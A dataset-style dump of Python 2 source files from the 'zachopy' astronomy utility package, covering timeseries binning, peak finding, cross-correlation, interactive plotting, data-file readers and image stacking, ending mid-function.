code
stringlengths 501
5.19M
| package
stringlengths 2
81
| path
stringlengths 9
304
| filename
stringlengths 4
145
|
---|---|---|---|
import matplotlib.pyplot as plt, numpy as np
import scipy.interpolate, scipy.stats
from astropy.modeling.models import Gaussian1D
from astropy.modeling.fitting import LevMarLSQFitter
# ignore divide errors
np.seterr(divide='ignore')
def minmax(x):
'''Return tuple of the (finite) max and min of an array.'''
return np.nanmin(x), np.nanmax(x)
def mad(x):
'''
Returns the median absolute deviation from the median,
a robust estimator of a distribution's width.
For a Gaussian distribution, sigma~1.48*MAD.
'''
med = np.median(x)
return np.median(np.abs(x - med))
def binto(x=None, y=None, yuncertainty=None,
binwidth=0.01,
test=False,
robust=True,
sem=True,
verbose=False):
'''Bin a timeseries to a given binwidth,
returning both the mean and standard deviation
(or median and approximate robust scatter).'''
if test:
n = 1000
x, y = np.arange(n), np.random.randn(n) - np.arange(n)*0.01 + 5
bx, by, be = binto(x, y, binwidth=20)
plt.figure('test of zachopy.binto')
plt.cla()
plt.plot(x, y, linewidth=0, markersize=4, alpha=0.3, marker='.', color='gray')
plt.errorbar(bx, by, be, linewidth=0, elinewidth=2, capthick=2, markersize=10, alpha=0.5, marker='.', color='blue')
return
min, max = np.min(x), np.max(x)
bins = np.arange(min, max+binwidth, binwidth)
count, edges = np.histogram(x, bins=bins)
sum, edges = np.histogram(x, bins=bins, weights=y)
if yuncertainty is not None:
count, edges = np.histogram(x, bins=bins)
numerator, edges = np.histogram(x, bins=bins, weights=y/yuncertainty**2)
denominator, edges = np.histogram(x, bins=bins, weights=1.0/yuncertainty**2)
mean = numerator/denominator
std = np.sqrt(1.0/denominator)
error = std
if False:
for i in range(len(bins)-1):
print bins[i], mean[i], error[i], count[i]
a = raw_input('???')
else:
if robust:
n= len(sum)
mean, std = np.zeros(n) + np.nan, np.zeros(n) + np.nan
for i in range(n):
inbin = (x>edges[i])*(x<=edges[i+1])
mean[i] = np.median(y[inbin])
std[i] = 1.48*mad(y[inbin])
else:
if yuncertainty is None:
mean = sum.astype(np.float)/count
sumofsquares, edges = np.histogram(x, bins=bins, weights=y**2)
std = np.sqrt(sumofsquares.astype(np.float)/count - mean**2)*np.sqrt(count.astype(np.float)/np.maximum(count-1.0, 1.0))
if sem:
error = std/np.sqrt(count)
else:
error = std
x = 0.5*(edges[1:] + edges[:-1])
return x, mean, error
if yuncertainty is not None:
print "Uh-oh, the yuncertainty feature hasn't be finished yet."
if robust:
print "Hmmm...the robust binning feature isn't finished yet."
def mediansmooth(x, y, xsmooth=0):
'''
smooth a (not necessarily evenly sampled) timeseries
x = the independent variable
y = the dependent variable
xsmooth = the *half-width* of the smoothing box
'''
assert(x.shape == y.shape)
ysmoothed = np.zeros_like(x)
for i, center in enumerate(x):
relevant = np.abs(x - center) <= xsmooth
ysmoothed[i] = np.median(y[relevant])
return ysmoothed
def peaks( x, y,
plot=False,
xsmooth=30,
threshold=100,
edgebuffer=10,
widthguess=1,
maskwidth=3,
returnfiltered=False):
'''Return the significant peaks in a 1D array.
required:
x, y = two 1D arrays
optional:
plot # should we show a plot?
xsmooth # half-width for median smoothing
threshold # how many MADs above background for peaks?
edgebuffer # reject peaks with this distance of an edge
widthguess # about how wide will the peaks be?
maskwidth # peak fits use x's within (maskwidth)*(widthguess)
If returnfiltered==True, then will return filtered arrays:
(xPeaks, yPeaks, xfiltered, yfiltered).
If returnfiltered==False, then only returns the peaks:
(xPeaks, yPeaks)
'''
# calculate a smoothed version of the curve
smoothed = mediansmooth(x, y, xsmooth=xsmooth)
filtered = (y - smoothed)
# calculate the mad of the whole thing
mad = np.median(np.abs(filtered))
# normalize the filtered timeseries
filtered /=mad
# calculate the derivatives
derivatives = (filtered[1:] - filtered[:-1])/(x[1:] - x[:-1])
# estimate peaks as zero crossings
guesses = np.zeros_like(x).astype(np.bool)
guesses[1:-1] = (derivatives[:-1] > 0) * (derivatives[1:] <= 0)
# make sue the peak is high enough to be interesting
guesses *= filtered > threshold
# make sure the peak isn't too close to an edge
guesses *= (x > np.min(x) + edgebuffer)*(x < np.max(x) - edgebuffer)
if plot:
# turn on interactive plotting
plt.ion()
# create a figure and gridspec
fi = plt.figure('peak finding')
gs = plt.matplotlib.gridspec.GridSpec(2,1, hspace=0.03)
# create axes for two kinds of plots
ax_raw = plt.subplot(gs[0])
plt.setp(ax_raw.get_xticklabels(), visible=False)
ax_filtered = plt.subplot(gs[1], sharex=ax_raw)
# plot the input vector
kw = dict(alpha=1, color='gray', linewidth=1)
ax_raw.plot(x, y, **kw)
ax_filtered.plot(x, filtered, **kw)
# plot the threshold
kw = dict(alpha=0.5, color='royalblue', linewidth=1)
ax_raw.plot(x, threshold*mad + smoothed, **kw)
ax_filtered.plot(x, threshold + np.zeros_like(x), **kw)
# set the scale
ax_raw.set_yscale('log')
ax_filtered.set_yscale('log')
ax_filtered.set_ylim(mad, np.max(filtered))
# plot the peak guesses
markerkw = dict( marker='o', markersize=6,
color='none', markeredgecolor='tomato',
alpha=0.5)
ax_raw.plot(x[guesses], y[guesses], **markerkw)
ax_filtered.plot(x[guesses], filtered[guesses], **markerkw)
# create an empty plot object for showing the fits in progress
fitplotter = ax_filtered.plot([],[],
alpha=0.5, color='red', linewidth=1)[0]
plt.draw()
a = raw_input("how 'bout them peaks?")
# create empty lists of peaks
xPeaks, yPeaks = [],[]
# create a fitter object
fitter = LevMarLSQFitter()
for g in np.nonzero(guesses)[0]:
# initialize an approximate Gaussian
gauss = Gaussian1D( mean=x[g],
amplitude=filtered[g],
stddev=widthguess)
# which points are relevant to this fit?
mask = np.abs(x - x[g]) <= maskwidth*widthguess
# use LM to fit the peak position and width
fit = fitter(gauss, x[mask], filtered[mask])
# store the peak values
distancemoved = np.abs((fit.mean.value - x[g])/fit.stddev.value)
if distancemoved <= 3.0:
xPeaks.append(fit.mean.value)
yPeaks.append(fit.amplitude.value)
if plot:
# update the Gaussian's parameters, and plot it
gauss.parameters = fit.parameters
xfine = np.linspace(*minmax(x[mask]), num=50)
fitplotter.set_data(xfine, gauss(xfine))
# plot the fitted peak
markerkw['color'] = markerkw['markeredgecolor']
markerkw['alpha'] = 1
ax_filtered.plot(xPeaks[-1], yPeaks[-1], **markerkw)
# set the xlimits
#ax_filtered.set_xlim(*minmax(x[mask]))
plt.draw()
a = raw_input(' and this one in particular?')
if returnfiltered:
return np.array(xPeaks), np.array(yPeaks), x, filtered
else:
return np.array(xPeaks), np.array(yPeaks)
'''a = raw_input('?')
# start at the highest point
highest = np.nonzero(filtered*mask == np.nanmax(filtered*mask))[0]
highest = np.where(y*mask == np.nanmax((y*mask)))[0]
highest = highest[0]
#print highest, highest.shape
while (y*mask)[highest] > threshold*mad:
g1 = astropy.modeling.models.Gaussian1D(amplitude=y[highest], mean=x[highest], stddev=1.0)
xtomask = (g1.mean + np.arange(-g1.stddev.value*maskwidth, g1.stddev.value*maskwidth))
toMask = np.interp(xtomask, x, np.arange(len(x))).astype(int)
toMask = toMask[toMask < len(x)]
toMask = toMask[toMask >= 0]
if len(toMask) > 0:
gfitter = astropy.modeling.fitting.LevMarLSQFitter()
fit = gfitter(g1, x[toMask], y[toMask])
#print g1
if g1.stddev.value < 5:
xPeaks.append(fit.mean.value)
yPeaks.append(fit.amplitude.value)
if plot:
ax[0].plot(x[toMask], g1(x[toMask]))
ax[1].plot(x[toMask], g1(x[toMask]))
mask[toMask] = 0.0
highest = np.where(y*mask == np.nanmax(y*mask))[0]
highest=highest[0]
if plot:
ax[0].scatter(xPeaks, yPeaks)
ax[1].scatter(xPeaks, yPeaks)
a = raw_input('what do you think of this peakfinding?')
return np.array(xPeaks), np.array(yPeaks)'''
def subtractContinuum(s, n=3, plot=False):
'''Take a 1D array, use spline to subtract off continuum.
subtractContinuum(s, n=3)
required:
s = the array
optional:
n = 3, the number of spline points to use
'''
x = np.arange(len(s))
points = (np.arange(n)+1)*len(s)/(n+1)
spline = scipy.interpolate.LSQUnivariateSpline(x,s,points)
if plot:
plt.ion()
plt.figure()
plt.plot(x, s)
plt.plot(x, spline(x), linewidth=5, alpha=0.5)
return s - spline(x)
def binsizes(x):
'''If x is an array of bin centers, calculate what their sizes are.
(assumes outermost bins are same size as their neighbors)'''
binsize = np.zeros_like(x)
binsize[0:-1] = (x[1:] - x[0:-1])
binsize[-1] = binsize[-2]
return binsize
def supersample(xin=None, yin=None, xout=None, demo=False, visualize=False, slow=True):
'''Super-sample an array onto a denser array, using nearest neighbor interpolation, handling edges of pixels properly.
(should be flux-preserving)
xin = input array of coordinates
yin = input array of values
xout = output array of coordinates where you would like values.
| xin[1:] - x[0:-1] must always be bigger than the largest spacing of the supersampled array |
| assumes coordinates are the center edge of bins, for both xin and xout |'''
# maybe I could make this faster using np.histogram?
if demo:
visualize=True
n = 10
xin = np.arange(n)
yin = np.random.random(n) + xin
nout = (20+ np.random.random())*n
xout = np.linspace(xin.min()-2, xin.max()+2, nout)
assert(xin is not None)
assert(yin is not None)
assert(xout is not None)
xinbinsize = binsizes(xin)
xinleft = xin - xinbinsize/2.0
xinright = xin +xinbinsize/2.0
xoutbinsize = binsizes(xout)
xoutleft = xout - xoutbinsize/2.0
xoutright = xout + xoutbinsize/2.0
if slow:
yout = np.zeros_like(xout).astype(np.float)
for out in range(len(xout)):
try:
inleft = (xinleft <= xoutleft[out]).nonzero()[0].max()
except:
inleft = 0
try:
inright = (xinright >= xoutright[out]).nonzero()[0].min()
except:
inright = -1
leftweight = (np.minimum(xinright[inleft], xoutright[out]) - xoutleft[out])/(xinright[inleft] - xinleft[inleft])
rightweight = (xoutright[out] - np.maximum(xinleft[inright],xoutleft[out]))/(xinright[inright] - xinleft[inright])*(inright != inleft)
yout[out] = (leftweight*yin[inleft] + rightweight*yin[inright])/(leftweight + rightweight)
#if renormalize:
# yout[out] *= (0.5*xinbinsize[inleft] + 0.5*xinbinsize[inright])/xoutbinsize[out]
#print "{0:4f} to {1:4f} = {2:6f}x{3:6f} + {4:6f}x{5:6f}".format(xoutleft[out], xoutright[out], leftweight, xin[inleft], rightweight, xin[inright])
yout[xoutright > xinright.max()] = 0
yout[xoutleft < xinleft.min()] = 0
else:
ones = np.ones((len(xin), len(xout)))
# set up the input arrays
sh = (len(xin),1)
matrix_xinleft = ones*xinleft.reshape(sh)
matrix_xinright = ones*xinright.reshape(sh)
matrix_xinbinsize = ones*xinbinsize.reshape(sh)
matrix_yin = ones*yin.reshape(sh)
# set up temporary output arrays
matrix_xoutleft = xoutleft*ones
matrix_xoutright = xoutright*ones
mask_left = (matrix_xinleft <= matrix_xoutleft) & (matrix_xinleft + matrix_xinbinsize >= matrix_xoutleft)
mask_right = (matrix_xinleft <= matrix_xoutright) & (matrix_xinleft + matrix_xinbinsize >= matrix_xoutright)
leftweight = (np.minimum(matrix_xinright, matrix_xoutright) - matrix_xoutleft)/matrix_xinbinsize*mask_left
rightweight = (matrix_xoutright - np.maximum(matrix_xinleft,matrix_xoutleft))/matrix_xinbinsize*mask_right
yout = np.sum((leftweight*matrix_yin+ rightweight*matrix_yin),0)/np.sum(leftweight + rightweight,0)
'''ones = np.ones((len(xin), len(xout)))
matrix_xout = xout*ones
matrix_xoutbin = binsizes(xout)*ones
matrix_yin = ones*yin.reshape((len(xin),1))
matrix_left = ones*xinleft.reshape((len(xin),1))
matrix_right = ones*xinright.reshape((len(xin),1))
rightweight = (matrix_right - matrix_xout)/matrix_xoutbin
rightweight *= (matrix_right - matrix_xout < 1) * (matrix_xout - matrix_left >= 0)
print rightweight
print
leftweight = (matrix_xout - matrix_left)/matrix_xoutbin
leftweight *= (matrix_right - matrix_xout< 1) * (matrix_xout - matrix_left >= 0)
print leftweight
print
print leftweight + rightweight
#matrix_yout = matrix_yin[0:-1,:]*rightweight[0:-1,:] + matrix_yin[1:None,:]*leftweight[0:-1,:]
matrix_yout = matrix_yin[0:-1,:]*leftweight[0:-1,:] + matrix_yin[1:None,:]*rightweight[1:None,:]'''
#yout = np.sum(matrix_yout, 0)
if visualize:
plt.cla()
plot_xin = np.vstack((xinleft,xinright)).reshape((-1,),order='F')
plot_yin = np.vstack((yin,yin)).reshape((-1,),order='F')
plt.plot(plot_xin, plot_yin, alpha=0.5, linewidth=3, color='black')
badinterpolation = scipy.interpolate.interp1d(xin, yin, kind='linear', bounds_error=False, fill_value=0.0)
plt.plot(xout, badinterpolation(xout), color='red', alpha=0.2, linewidth=2)
plot_xout = np.vstack((xoutleft,xoutright)).reshape((-1,),order='F')
plot_yout = np.vstack((yout,yout)).reshape((-1,),order='F')
plt.plot(plot_xout, plot_yout, color='orange', alpha=0.7, linewidth=4, markersize=10)
plt.plot(xout, yout, color='orange', alpha=0.7, linewidth=0, markersize=20)
a = raw_input('okay?')
return yout
def plothistogram( y, nbins=None, binwidth=0.1, ax=plt.gca(), expectation=None, scale='linear', nsigma=5, **kwargs):
if nbins is not None:
binwidth = (np.max(y) - np.min(y))/nbins
if expectation is not None:
mean = expectation[0]
width = expectation[1]
min = mean - nsigma*width
max = mean + nsigma*width
else:
pad = 3
min = np.min(y)-pad*binwidth
max = np.max(y)+pad*binwidth
yhist, edges = np.histogram(y, bins=np.arange(min, max, binwidth))
if len(edges) == 1:
return
if np.max(yhist) == 0:
return
normalization = (len(y)+0.0)/nsigma
yhist = np.array(yhist).astype(float)/ normalization
xhist = (edges[1:] + edges[0:-1])/2.0
# if given an expectation, plot it as a histogram
if expectation is not None:
g = scipy.stats.norm(mean, width)
n = len(y)
exhist = np.zeros(len(xhist))
for i in range(len(xhist)):
start = xhist[i] - binwidth/2.0
finish = xhist[i] + binwidth/2.0
exhist[i] = n*(g.cdf(finish) - g.cdf(start))
bottom = np.maximum(exhist - np.sqrt(exhist), 0)/normalization
top = (exhist + np.sqrt(exhist))/normalization
ax.fill_betweenx(xhist, bottom, top, color='gray', alpha=0.5, linewidth=4)
ax.plot(top, xhist, color='gray', alpha=0.5, linewidth=4)
ax.plot(np.maximum(yhist, 0.000001/normalization), xhist, **kwargs)
if scale == 'log':
ax.set_xscale('log')
ax.set_xlim(0.9/normalization, np.max(exhist/normalization)*1.3)
if scale == 'linear':
ax.set_xscale('linear')
ax.set_xlim(0, np.max(exhist/normalization)*1.3)
#ax.set_ylim(min, max)
#ax.set_xticks([])
#ax.set_yticks([])
#print "HISTOGRAMMING!"
#print xhist
#print yhist
#print exhist/normalization
#assert(False)
def binnedrms(y):
'''Calculate the (unweighted) binned RMS of an array.'''
# define a dummy x variable
x = np.arange(len(y))
n = np.arange(1,len(y)/3)
rms = np.zeros(len(n))
for i in range(len(n)):
binned = np.histogram(x, bins=np.arange(len(x)/n[i])*n[i], weights=y)[0]/n[i]
#print binned
rms[i] = np.std(binned)
#print n[i], rms[i]
return n, rms
def plotbinnedrms(y, ax=None, xunit=1, scale='log', yunits=1, yrange=[50,5000], updateifpossible=True, **kwargs):
n, rms = binnedrms(y*yunits)
x = xunit*n
# if the plot is already full,
try:
assert(updateifpossible)
lines = ax.get_lines()
lines[0].set_data(x, rms[0]/np.sqrt(n))
lines[1].set_data(x, rms)
except:
ax.plot(x, rms[0]/np.sqrt(n), linestyle='--', color='black', alpha=0.25, linewidth=3)
ax.plot(x, rms, **kwargs)
if scale == 'log':
ax.set_xscale('log')
ax.set_yscale('log')
ax.set_ylim(*yrange)
ax.set_xlim(1, np.max(n))
else:
ax.set_xlim(0, np.max(x)+1)
ax.set_ylim(0, np.max(yrange))
def acf(y):
'''Calculate the autocorrelation function of an array,
returning an array of lags and an array with the acf.'''
a = np.correlate(y,y,'full')
trimmed = a[len(a)/2:]
lag = np.arange(len(trimmed))
return lag, trimmed/np.correlate(y,y)
def plotautocorrelation(y, ax=None,
xunit=1,
max=25,
yrange=[-0.2, 1],
**kwargs):
'''Plot the autocorrelation function of an array, as a function of lag.
y = the array, must be evenly spaced in x
ax = the Axes object to plot in
xunit = the scale of the x-coordinate (e.g. x[1] - x[0])
max = how many lag gridpoints to show?
yrange = the ylimits for the plot
**kwargs = passed to the ax.plot command
'''
lag, auto = acf(y)
x = lag*xunit
end = np.minimum(len(y), max)
ax.plot([0, end -1], [0,0], linestyle='--', color='black', alpha=0.25, linewidth=3)
ax.plot(x, auto, **kwargs)
ax.set_xlim(-1, end)
ax.set_ylim(*yrange)
def ccf(f, g, scale=1.0):
'''Calculate the normalized cross-correlation function of two identically-size arrays.
[required]:
f = an N-element array (for example, spectrum of target star)
g = an N-element array (for example, spectrum of template star)
scale = a scalar indicating what the indices of f and g (one unit of "lag") correspond to
'''
# how long are our arrays
N = len(f)
# define the x-axis, if not supplied
assert(len(f) == len(g))
x = np.arange(-N+1, N, 1.0)*scale
# calculation the normalized cross-correlation function
sigma_f = np.sqrt(np.sum(f**2)/N)
sigma_g = np.sqrt(np.sum(g**2)/N)
C_fg = np.correlate(f, g, 'full')/N/sigma_f/sigma_g
# WILL THIS WORK?
return scipy.interpolate.interp1d(x,C_fg, fill_value=0.0, bounds_error=False)
def todcor(f, g1, g2, scale=1.0, luminosity_ratio=None):
'''Calculate the 2D correlation of a 1D array with two template arrays.'''
assert(len(f) == len(g1))
assert(len(f) == len(g2))
C_1 = ccf(f, g1, scale=scale)
C_2 = ccf(f, g2, scale=scale)
C_12 = ccf(g1, g2, scale=scale)
N = len(f)
sigma_g1 = np.sqrt(np.sum(g1**2)/N)
sigma_g2 = np.sqrt(np.sum(g2**2)/N)
def bestalphaprime(s1, s2):
return sigma_g1/sigma_g2*(C_1(s1)*C_12(s2 - s1) - C_2(s2))/(C_2(s2)*C_12(s2-s1) - C_1(s1))
def R(s1, s2):
#a =
if luminosity_ratio is None:
a = np.maximum(np.minimum(bestalphaprime(s1,s2), sigma_g2/sigma_g1), 0.0)
flexiblecorrelation = (C_1(s1) + a*C_2(s2))/np.sqrt(1.0 + 2*a*C_12(s2 - s1) + a**2)
ok = np.isfinite(a)
peak = np.argmax(flexiblecorrelation[ok].flatten())
a = a[ok].flatten()[peak]
else:
a = luminosity_ratio*sigma_g2/sigma_g1
#print "alpha spans", np.min(a), np.max(a)
return (C_1(s1) + a*C_2(s2))/np.sqrt(1.0 + 2*a*C_12(s2 - s1) + a**2), a*sigma_g1/sigma_g2
return R | zachopy | /zachopy-0.1.4.tar.gz/zachopy-0.1.4/oned.py | oned.py |
import os
import numpy as np
# a mkdir that doesn't complain
def mkdir(path):
try:
os.mkdir(path)
except:
pass
# stolen from the internet (SciPy cookbook)
def rebin(a, *args):
'''rebin ndarray data into a smaller ndarray of the same rank whose dimensions
are factors of the original dimensions. eg. An array with 6 columns and 4 rows
can be reduced to have 6,3,2 or 1 columns and 4,2 or 1 rows.
example usages:
>>> a=rand(6,4); b=rebin(a,3,2)
>>> a=rand(6); b=rebin(a,2)
'''
shape = a.shape
lenShape = len(shape)
factor = np.asarray(shape)/np.asarray(args)
evList = ['a.reshape('] + \
['args[%d],factor[%d],'%(i,i) for i in range(lenShape)] + \
[')'] + ['.sum(%d)'%(i+1) for i in range(lenShape)] + \
['/factor[%d]'%i for i in range(lenShape)]
#print ''.join(evList)
return eval(''.join(evList))
# stolen from the internet (SciPy cookbook)
def rebin_total(a, *args):
'''rebin ndarray data into a smaller ndarray of the same rank whose dimensions
are factors of the original dimensions. eg. An array with 6 columns and 4 rows
can be reduced to have 6,3,2 or 1 columns and 4,2 or 1 rows.
example usages:
>>> a=rand(6,4); b=rebin(a,3,2)
>>> a=rand(6); b=rebin(a,2)
'''
shape = a.shape
lenShape = len(shape)
factor = np.asarray(shape)/np.asarray(args)
evList = ['a.reshape('] + \
['args[%d],factor[%d],'%(i,i) for i in range(lenShape)] + \
[')'] + ['.sum(%d)'%(i+1) for i in range(lenShape)]
#print ''.join(evList)
return eval(''.join(evList))
#swiped from stack overflow
def find_nearest(array,value,verbose=False):
idx = (np.abs(np.array(array)-value)).argmin()
if verbose:
print "{0} --> {1}".format(value, array[idx])
return array[idx]
# modified from above
def find_two_nearest(array,value,verbose=False):
# assumes ordered arrays and that value falls between the min and max of the array
offset = value - np.array(array)
signs = np.sign(offset)
# handle 1-element arrays
if len(array) == 1:
return [array[0], array[0]]
if (signs == -1).all() | (signs == 1).all():
# value is below the minimum of the array
m = np.argmin(np.abs(offset))
left, right = m, m
else:
# the value is somewhere in the bounds between the array's min and max
left = (signs[1:] - signs[0:-1]).nonzero()[0][0]
right = left + 1
nearest = [array[left], array[right]]
if verbose:
print
for k in locals().keys():
print '{0:>10} = {1}'.format(k, locals()[k])
print
return nearest
def interpolation_weights(bounds, value, verbose=True):
if bounds[0] == bounds[1]:
return 1.0, 0.0
assert((value >= np.min(bounds)) * (value <= np.max(bounds)))
span = np.float(bounds[1] - bounds[0])
weights = [(bounds[1] - value)/span, (value - bounds[0])/span]
return weights
def truncate(str, n=12, etc=' ...'):
if len(str) > n:
return str[0:n-len(etc)] + etc
else:
return ("{0: ^%d}" % n).format(str)
def mad(x):
med = np.median(x)
return np.median(np.abs(x - med)) | zachopy | /zachopy-0.1.4.tar.gz/zachopy-0.1.4/utils.py | utils.py |
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from Talker import Talker
class iplot(Talker):
def __init__(self, nRows, nCols, verbose=True, **kwargs):
'''initialize as you would a matplotlib.gridspec.GridSpec,
but it will be interactive too.'''
# make sure interactive plotting is turned on
plt.ion()
Talker.__init__(self)
# create a gridspec object
self.gs = gridspec.GridSpec(nRows,nCols,**kwargs)
# create an empty dictionary to store axes
self.axes = {}
def subplot(self, row=0, col=0,rowspan=1,colspan=1,name=None, **kwargs):
# create the axis object, using the gridspec language
# for example,
ax = plt.subplot(self.gs[row:row + rowspan, col:col + colspan], **kwargs)
self.figure = plt.gcf()
if name == None:
name = 'ax{0}'.format(len(self.axes))
self.axes[name] = ax
return ax
def onKeyPress(self, event):
'''when a keyboard button is pressed, record the event'''
self.keypressed = event
if self.whenpressed is not None:
self.whenpressed(self.keypressed)
self.stop()
def onKeyRelease(self, event):
'''when a keyboard button is released, stop the loop'''
self.keyreleased = event
self.stop()
def onEnterAxes(self, event):
#print 'enter_axes', event.inaxes
event.inaxes.patch.set_facecolor('yellow')
event.canvas.draw()
def onLeaveAxes(self, event):
#print 'leave_axes', event.inaxes
event.inaxes.patch.set_facecolor('white')
event.canvas.draw()
def onClick(self, event):
if event.xdata is None:
self.speak("Hmmm, that wasn't a very nice click. Could you please try again?")
return
self.lastMouseClick = event
self.mouseClicks.append(event)
self.remainingClicks -= 1
if self.remainingClicks <= 0:
self.stop()
def getMouseClicks(self, n=2):
# say what's happening
self.speak("waiting for {0} mouse clicks.".format(n))
# set the countdown for the number of clicks
self.remainingClicks = n
self.mouseClicks = []
# start the event handling loop for mouse button releases
self.cids = [self.watchfor('button_release_event', self.onClick)]
self.startloop()
# return a list of mouse clicks, which the loop should have generated
return self.mouseClicks
def getKeyboard(self, whenpressed=None):
'''wait for a keyboard press and release.
whenpressed can be a function that will be called on
the key press (before the key release); it must be
able to take a KeyEvent as an argument'''
# warn what's happening
self.speak('waiting for a key to be pressed and released')
# start the loop
self.cids = [self.watchfor('key_press_event', self.onKeyPress)]
# this function will be called when the key is pressed
self.whenpressed = whenpressed
# start the loop (it'll end when key is pressed)
self.startloop()
print self.keypressed.key
print self.keypressed.xdata
print self.keypressed.ydata
# return the key that was pressed
return self.keypressed
def watchfor(self, *args):
'''shortcut for mpl_connect'''
return self.figure.canvas.mpl_connect(*args)
def stopwatching(self, cids):
'''shortcut to stop watching for particular events'''
for cid in cids:
self.figure.canvas.mpl_disconnect(cid)
def startloop(self):
'''start the event loop'''
self.figure.canvas.start_event_loop(0)
def stoploop(self):
'''stop the event loop'''
self.figure.canvas.stop_event_loop()
def stop(self):
'''stop the loop, and disconnect watchers'''
self.stoploop()
self.stopwatching(self.cids) | zachopy | /zachopy-0.1.4.tar.gz/zachopy-0.1.4/iplot.py | iplot.py |
import astropy.io.ascii, numpy as np
def parameters(filename):
'''Read a Z-style parameter file into a dictionary. This file should look like:
-----------------------------
# define some separators, making sure to leave a blank line after the header
" = name
' = date
# exposures of Barnard's, to be used as the template
"Barnard's Star"
'140916' 1118 1119 1120
'140917' 1119 1120 1121
'141007' 1118 1119 1120
'141015' 1117 1118 1119
-----------------------------
and will return a dictionary with which you can do something like result["Barnard's Star"]["140916"] to access a list of parameters for each row.'''
# open a file
file = open(filename, 'rU')
# split it into a list of lines
lines = file.readlines()
# create an empty dictionary
levels = []
dictionary = {}
keytypes = {}
# loop through the lines of the header
while(True):
line = lines.pop(0)
# skip comments
if line[0] == '#':
continue
# stop when you get to the end of the header
if line[0] == '\n':
break
chunks = line.split()
separator = chunks[0]
keytype = chunks[-1]
keytypes[separator] = keytype
levels.append(keytype)
print " grouping lines starting with {0} under the entry '{1}'".format(separator, keytype)
# loop through the rest of the lines
level = dictionary
while(len(lines)>0):
# take the next line
line = lines.pop(0)
# skip comments and blanks
if line[0] == '#':
continue
# reset to top level if hit a space
if line[0] == '\n':
continue
separator = line[0]
keytype = keytypes[separator]
empty, key, data = line.split(separator)
if keytype == levels[-1]:
# at the innermost level, store the data
level[key] = data.split()
else:
# at the outermost level, reset the to the highest level dictionary
if keytype == levels[0]:
level = dictionary
# at all but the innermost level, make and move into a new level of dictionary
level[key] = {}
level = level[key]
return dictionary
def table(filename, individuals=False):
'''Use astropy, 'cause it's super convenient!
For cool tricks with astropy tables, check out astropy.readthedocs.org'''
return astropy.io.ascii.read(filename)
def transmissionspectrum(filename):
'''Read a Z-style transmission spectrum file.'''
# open a file
file = open(filename, 'rU')
print "Reading transmission spectrum from " + filename
# split it into a list of lines
lines = file.readlines()
# first, interpret the header to learn column names and units
noheader, nounits = True, True
while(noheader or nounits):
line = lines.pop(0)
# skip comments and blanks
if line[0] == '#' or line[0] == '\n':
continue
# the first uncommented line should be the headers
if noheader:
columns = line.split()
noheader = False
continue
# the second uncommented line should be the units
if nounits:
units = dict(zip(columns, line.split()))
nounits = False
# then read the data into an astropy table
table = astropy.io.ascii.read(lines, names=columns)
# standardize wavelength columns' units
wavelengthunits = dict(nm=1.0, angstrom=0.1, micron=1000.0)
for column in ['left', 'center', 'right']:
try:
table[column] = table[column].astype(np.float)*wavelengthunits[units[column]]
print ' converted ' + column + ' from ' + units[column]
except:
pass
# standardize the wavelength columns into left, center, right
if 'left' in columns and 'right' in columns:
table.add_column(table.Column(name='center', data=(table['left'] + table['right'])/2.0),1)
elif 'center' in columns:
binsize = np.mean(table['center'][1:] - table['center'][:-1])
table.add_column(table.Column(name='left', data=(table['center'] - binsize/2.0)),0)
table.add_column(table.Column(name='right', data=(table['center'] + binsize/2.0)),2)
# standardize depthlike columns' units
depthlikeunits = dict(unity=1.0, ppm=1.0e-6, percent=0.01)
for measurement in ['depth', 'rp_over_rs']:
try:
for column in [measurement, measurement + '_error']:
temp = table.Column(table[column], dtype=np.float)
table.remove_column(column)
table.add_column(temp)
table[column] *=depthlikeunits[units[column]]
print ' converted ' + column + ' from ' + units[column]
except:
print " no " + measurement + " columns found."
# convert depths to rp_over_rs
if 'depth' in columns:
rp_over_rs = table.Column(name='rp_over_rs', data=np.sqrt(table['depth']))
rp_over_rs_error = table.Column(name='rp_over_rs_error', data=table['depth_error']/rp_over_rs/2.0)
table.add_columns([rp_over_rs, rp_over_rs_error])
table.remove_columns(['depth', 'depth_error'])
print table
return table
def mind(*args, **kwargs):
return 42 | zachopy | /zachopy-0.1.4.tar.gz/zachopy-0.1.4/read.py | read.py |
import numpy as np
import scipy.ndimage
import matplotlib.pyplot as plt
import displays.ds9
def scatter(cube, axis=0):
shape = np.array(cube.shape)
shape[axis] = 1
med = np.median(cube, axis=axis)
mad = np.median(np.abs(cube - med.reshape(shape)), axis=axis)
return 1.48*mad
def stack(cube, axis=0, threshold=5.0):
'''Combine a cube of images into one mean image, using a MAD noise estimator to reject outliers.'''
shape = np.array(cube.shape)
shape[axis] = 1
med = np.median(cube, axis=axis).reshape(shape)
noise = scatter(cube, axis=axis).reshape(shape)
good = (np.abs(cube - med) < threshold*noise) | (noise == 0)
mean = np.sum(good*cube, axis=axis)/np.sum(good, axis=axis)
return mean, noise#.squeeze()
def interpolateOverBadPixels(image, bad, scale=2, visualize=False):
'''Take an image and a bad pixel mask (=1 where bad, =0 otherwise) and interpolate over the bad pixels, using a Gaussian smoothing.'''
smoothed = scipy.ndimage.filters.gaussian_filter(image*(bad == False), sigma=[scale,scale])
weights = scipy.ndimage.filters.gaussian_filter(np.array(bad == False).astype(np.float), sigma=[scale,scale])
smoothed /=weights
corrected = image + 0.0
corrected[bad.astype(np.bool)] = smoothed[bad.astype(np.bool)]
if visualize:
gs = plt.matplotlib.gridspec.GridSpec(1,4, wspace=0,hspace=0)
orig = plt.subplot(gs[0])
smoo = plt.subplot(gs[1], sharex=orig, sharey=orig)
weig = plt.subplot(gs[2], sharex=orig, sharey=orig)
corr = plt.subplot(gs[3], sharex=orig, sharey=orig)
kw = dict(cmap='gray', interpolation='nearest')
orig.imshow(np.log(image), **kw)
smoo.imshow(np.log(smoothed), **kw)
weig.imshow(bad, **kw)
corr.imshow(np.log(corrected), **kw)
plt.draw()
a = raw_input('test?')
return corrected
def polyInterpolate(image, bad, axis=0, order=2, visualize=True):
'''Take an image and a bad pixel mask (=1 where bad, =0 otherwise), fit polynomials to the good data in one dimension, and return this polynomial smoothed version.'''
n = image.shape[axis]
smoothed = np.zeros_like(image)
if visualize:
plt.figure('interpolating in a 2D image')
gs = plt.matplotlib.gridspec.GridSpec(1,1)
ax = plt.subplot(gs[0,0])
d = displays.ds9('poly')
for i in range(image.shape[axis]):
ydata = image.take(i, axis=axis)
baddata = bad.take(i, axis=axis)
xdata = np.arange(len(ydata))
ok = baddata == 0
med = np.median(ydata[ok])
mad = np.median(np.abs(ydata[ok] - med))
